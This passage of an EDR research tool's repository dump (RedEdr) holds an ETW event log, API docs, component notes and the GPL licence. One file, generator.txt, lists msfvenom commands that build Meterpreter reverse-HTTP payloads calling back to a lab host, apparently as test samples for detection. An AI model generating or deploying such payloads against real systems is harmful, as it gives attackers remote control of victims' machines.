","id":149,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816201,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84D50000","ImageBase":"00007FFC84D50000","ImageCheckSum":"3511252","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\combase.dll","ImageSize":"0000000000353000","ProcessID":"1208","TimeDateStamp":"3888075817","event":"ImageUnloadInfo ","id":150,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816259,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC850F0000","ImageBase":"00007FFC850F0000","ImageCheckSum":"2047181","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ntdll.dll","ImageSize":"00000000001F8000","ProcessID":"1208","TimeDateStamp":"1754238027","event":"ImageUnloadInfo ","id":151,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816312,"trace_id":41,"type":"etw"},{"CPUCycleCount":"184728780","CommitCharge":"24412160","CommitPeak":"24461312","CreateTime":"133791868973820309","ExitCode":"3221225477","ExitTime":"133791868989814630","HandleCount":"100","HardFaultCount":"0","ImageName":"RedEdrTester.e","ProcessID":"1208","ProcessSequenceNumber":"2314","ReadOperationCount":"9","ReadTransferKiloBytes":"22","TokenElevationType":"3","WriteOperationCount":"45","WriteTransferKiloBytes":"20","event":"ProcessStopStop ","id":152,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801521634,18446735283801520587,18446735283801519924,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816369,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"4","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"64","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":153,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868979063418,"trace_id":41,"type":"etw"}]

================================================
FILE: Data/generator.txt
================================================
# non-staged
msfvenom -a x64 -p windows/x64/meterpreter_reverse_http AUTOLOADSTDAPI=FALSE LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-nonstaged-noautoload.bin
msfvenom -a x64 -p windows/x64/meterpreter_reverse_http LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-nonstaged-autoload.bin

# staged
msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-staged.bin
msfvenom -a x64 -p windows/x64/meterpreter/reverse_http AUTOLOADSTDAPI=FALSE LPORT=8080 LHOST=10.10.10.107 -f raw -o meterpreter-revhttp-staged-noautoload.bin

================================================
FILE: Doc/api.md
================================================
# RedEdr HTTP API Documentation

This document is AI generated but reviewed.

RedEdr provides a REST API through an embedded HTTP server for interacting with the EDR system. The web server listens on a configurable port and provides both a web UI and programmatic API access.

## Data definition

**Events** can be viewed as a dict (key value pair). It is mostly flat, but can contain arrays or further dicts: 
```

```


## HTTP UI

Provides a easy to use web interface for RedEdr on localhost.

### GET /
Serves the main web UI.
- **Response**: HTML content of the main interface

### GET /static/design.css
Serves the CSS stylesheet.
- **Response**: CSS content for styling

### GET /static/shared.js
Serves the JavaScript file.
- **Response**: JavaScript content for the web interface

### GET /api/stats
Returns system statistics and counters.
- **Response**: JSON object with event counts and statistics
- **Content-Type**: `application/json; charset=UTF-8`
- **Response Fields**:
  - `events_count` - Total number of events
  - `num_kernel` - Number of kernel events
  - `num_etw` - Number of ETW events
  - `num_etwti` - Number of ETW TI events
  - `num_dll` - Number of DLL events
  - `num_process_cache` - Number of cached processes

### GET /api/save
Saves current events to a file.
- **Response**: Triggers save operation
- **Side Effect**: Events are saved to disk


## Enable Tracing and Payload Execution

Used to define what RedEdr will look at, and provides an option
to also execute the malware. Primarily used by Detonator. 


### GET /api/trace/info
Gets the current trace target executable names.
- **Response**: JSON object with current trace targets
- **Content-Type**: `application/json`
- **Response Format**: `{"trace": ["target1", "target2"]}`

### POST /api/trace/start
Sets the process name(s) to be observed.

Request: `application/json`
- `{"trace": ["executable1", "executable2"]}` - Multiple targets

Response: `application/json`
- **Response**: `{"result": "ok"}` on success
- **Error Responses**:
  - `400` - Invalid JSON or missing arguments

### POST /api/trace/reset
Resets all captured events and system state.
- **Response**: Clears all current data
- **Side Effect**: All events and state are reset


## Retrieve Log Results

Actually retrieve the recorded logs of all involved components. 


### GET /api/logs/rededr

Retrieves all captured events from the current session.
Events are things recorded by RedEdr, including ETW events, or DLL hooking events.

Response: `application/json`
- Array of event objects

Response Example:
```json
[
    { 
        "date":"2025-07-20-10-36-24",
        "do_etw":false,
        "do_etwti":false,
        "do_hook":false,
        "do_hook_callstack": true,
        "func":"init",
        "target":"otepad",
        "trace_id":41,
        "type":"meta",
        "version":"0.4"
    }
]
```

### GET /api/logs/agent
Get the logging output of the agent itself (RedEdr and also RedEdrPplService).

Response: `application/json`
- Array of log strings

Response example:
```json
[ 
    "RedEdr 0.4",
    "Config: tracing otepad",
    "Permissions: Enabled PRIVILEGED & DEBUG"
]
```


## Lock Management

If RedEdr is used by multiple users, they can lock RedEdr for their
duration of use. If this is not being done, weird results will happen.

### POST /api/lock/acquire
Acquires a resource lock to prevent concurrent access.
- **Response**: `200 OK` if lock acquired successfully
- **Error Responses**:
  - `409 Conflict` - Resource is already in use
  - `{"status": "error", "message": "Resource is already in use"}`

### POST /api/lock/release
Releases the resource lock.
- **Response**: `200 OK` - Lock released

### GET /api/lock/status
Gets the current lock status.
- **Response**: JSON object with lock state
- **Response Format**: `{"in_use": true/false}`



================================================
FILE: Doc/notes.md
================================================
# Notes

## Solutions

RedEdr: 
* ETW reader
* MPLOG reader
* pipe-server for RedEdrDll (`pipe\\RedEdrDllCom`)
* pipe-server for RedEdrDriver (`pipe\\RedEdrKrnCom`)
* pipe-client for RedEdrPplService (`pipe\\RedEdrPplService`)

RedEdrDriver:
* Kernel driver to capture kernel callbacks
* Will do KAPC injection
* connects to RedEdr `pipe\\RedEdrKrnCom` to transmit captured data
* Receives IOCTL from RedEdr to be instructed

RedEdrPplService: 
* to be loaded as PPL windows service
* To capture ETW-TI
* connects to RedEdr `pipe\\RedEdrDllCom` to transmit captured data
* provides `pipe\\RedEdrPplService` for RedEdr to connect to be instructed

RedEdrDll: 
* amsi.dll style, to be injected into target processes
* connects to RedEdr `pipe\\RedEdrDllCom` to transmit captured data
* will receive config from RedEdr first

RedEdrTester: 
* internal testing tool


## Notifications

Notify components about new config: 
* RedEdr: Automatic
* RedEdrDriver: send IOCTL
* RedEdrPplService: pipe
* RedEdrDll: pipe (automatic on new process creation))


================================================
FILE: LICENSE.txt
================================================
                    GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

                            Preamble

  The GNU General Public License is a free, copyleft license for
software and other kinds of works.

  The licenses for most software and other practical works are designed
to take away your freedom to share and change the works.  By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.  We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors.  You can apply it to
your programs, too.

  When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

  To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights.  Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

  For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received.  You must make sure that they, too, receive
or can get the source code.  And you must show them these terms so they
know their rights.

  Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.

  For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software.  For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

  Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so.  This is fundamentally incompatible with the aim of
protecting users' freedom to change the software.  The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable.  Therefore, we
have designed this version of the GPL to prohibit the practice for those
products.  If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

  Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary.  To prevent this, the GPL assures that
patents cannot be used to render the program non-free.

  The precise terms and conditions for copying, distribution and
modification follow.

                       TERMS AND CONDITIONS

  0. Definitions.

  "This License" refers to version 3 of the GNU General Public License.

  "Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.

  "The Program" refers to any copyrightable work licensed under this
License.  Each licensee is addressed as "you".  "Licensees" and
"recipients" may be individuals or organizations.

  To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy.  The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.

  A "covered work" means either the unmodified Program or a work based
on the Program.

  To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy.  Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.

  To "convey" a work means any kind of propagation that enables other
parties to make or receive copies.  Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.

  An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License.  If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.

  1. Source Code.

  The "source code" for a work means the preferred form of the work
for making modifications to it.  "Object code" means any non-source
form of a work.

  A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.

  The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form.  A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.

  The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities.  However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work.  For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.

  The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.

  The Corresponding Source for a work in source code form is that
same work.

  2. Basic Permissions.

  All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met.  This License explicitly affirms your unlimited
permission to run the unmodified Program.  The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work.  This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.

  You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force.  You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright.  Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.

  Conveying under any other circumstances is permitted solely under
the conditions stated below.  Sublicensing is not allowed; section 10
makes it unnecessary.

  3. Protecting Users' Legal Rights From Anti-Circumvention Law.

  No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.

  When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.

  4. Conveying Verbatim Copies.

  You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.

  You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.

  5. Conveying Modified Source Versions.

  You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:

    a) The work must carry prominent notices stating that you modified
    it, and giving a relevant date.

    b) The work must carry prominent notices stating that it is
    released under this License and any conditions added under section
    7.  This requirement modifies the requirement in section 4 to
    "keep intact all notices".

    c) You must license the entire work, as a whole, under this
    License to anyone who comes into possession of a copy.  This
    License will therefore apply, along with any applicable section 7
    additional terms, to the whole of the work, and all its parts,
    regardless of how they are packaged.  This License gives no
    permission to license the work in any other way, but it does not
    invalidate such permission if you have separately received it.

    d) If the work has interactive user interfaces, each must display
    Appropriate Legal Notices; however, if the Program has interactive
    interfaces that do not display Appropriate Legal Notices, your
    work need not make them do so.

  A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit.  Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.

  6. Conveying Non-Source Forms.

  You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:

    a) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by the
    Corresponding Source fixed on a durable physical medium
    customarily used for software interchange.

    b) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by a
    written offer, valid for at least three years and valid for as
    long as you offer spare parts or customer support for that product
    model, to give anyone who possesses the object code either (1) a
    copy of the Corresponding Source for all the software in the
    product that is covered by this License, on a durable physical
    medium customarily used for software interchange, for a price no
    more than your reasonable cost of physically performing this
    conveying of source, or (2) access to copy the
    Corresponding Source from a network server at no charge.

    c) Convey individual copies of the object code with a copy of the
    written offer to provide the Corresponding Source.  This
    alternative is allowed only occasionally and noncommercially, and
    only if you received the object code with such an offer, in accord
    with subsection 6b.

    d) Convey the object code by offering access from a designated
    place (gratis or for a charge), and offer equivalent access to the
    Corresponding Source in the same way through the same place at no
    further charge.  You need not require recipients to copy the
    Corresponding Source along with the object code.  If the place to
    copy the object code is a network server, the Corresponding Source
    may be on a different server (operated by you or a third party)
    that supports equivalent copying facilities, provided you maintain
    clear directions next to the object code saying where to find the
    Corresponding Source.  Regardless of what server hosts the
    Corresponding Source, you remain obligated to ensure that it is
    available for as long as needed to satisfy these requirements.

    e) Convey the object code using peer-to-peer transmission, provided
    you inform other peers where the object code and Corresponding
    Source of the work are being offered to the general public at no
    charge under subsection 6d.

  A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.

  A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling.  In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage.  For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product.  A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.

  "Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source.  The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.

  If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information.  But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).

  The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed.  Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.

  Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.

  7. Additional Terms.

  "Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law.  If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.

  When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it.  (Additional permissions may be written to require their own
removal in certain cases when you modify the work.)  You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.

  Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:

    a) Disclaiming warranty or limiting liability differently from the
    terms of sections 15 and 16 of this License; or

    b) Requiring preservation of specified reasonable legal notices or
    author attributions in that material or in the Appropriate Legal
    Notices displayed by works containing it; or

    c) Prohibiting misrepresentation of the origin of that material, or
    requiring that modified versions of such material be marked in
    reasonable ways as different from the original version; or

    d) Limiting the use for publicity purposes of names of licensors or
    authors of the material; or

    e) Declining to grant rights under trademark law for use of some
    trade names, trademarks, or service marks; or

    f) Requiring indemnification of licensors and authors of that
    material by anyone who conveys the material (or modified versions of
    it) with contractual assumptions of liability to the recipient, for
    any liability that these contractual assumptions directly impose on
    those licensors and authors.

  All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10.  If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term.  If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.

  If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.

  Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.

  8. Termination.

  You may not propagate or modify a covered work except as expressly
provided under this License.  Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).

  However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.

  Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.

  Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License.  If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.

  9. Acceptance Not Required for Having Copies.

  You are not required to accept this License in order to receive or
run a copy of the Program.  Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance.  However,
nothing other than this License grants you permission to propagate or
modify any covered work.  These actions infringe copyright if you do
not accept this License.  Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.

  10. Automatic Licensing of Downstream Recipients.

  Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License.  You are not responsible
for enforcing compliance by third parties with this License.

  An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations.  If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.

  You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License.  For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.

  11. Patents.

  A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based.  The
work thus licensed is called the contributor's "contributor version".

  A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version.  For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.

  Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.

  In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement).  To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.

  If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients.  "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.

  If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.

  A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License.  You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.

  Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.

  12. No Surrender of Others' Freedom.

  If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License.  If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all.  For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.

  13. Use with the GNU Affero General Public License.

  Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work.  The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.

  14. Revised Versions of this License.

  The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.

  Each version is given a distinguishing version number.  If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation.  If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.

  If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.

  Later license versions may give you additional or different
permissions.  However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.

  15. Disclaimer of Warranty.

  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

  16. Limitation of Liability.

  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.

  17. Interpretation of Sections 15 and 16.

  If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.

                     END OF TERMS AND CONDITIONS

            How to Apply These Terms to Your New Programs

  If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.

  To do so, attach the following notices to the program.  It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.

    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.

Also add information on how to contact you by electronic and paper mail.

  If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:

    <program>  Copyright (C) <year>  <name of author>
    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License.  Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".

  You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.

  The GNU General Public License does not permit incorporating your program
into proprietary programs.  If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library.  If this is what you want to do, use the GNU Lesser General
Public License instead of this License.  But first, please read
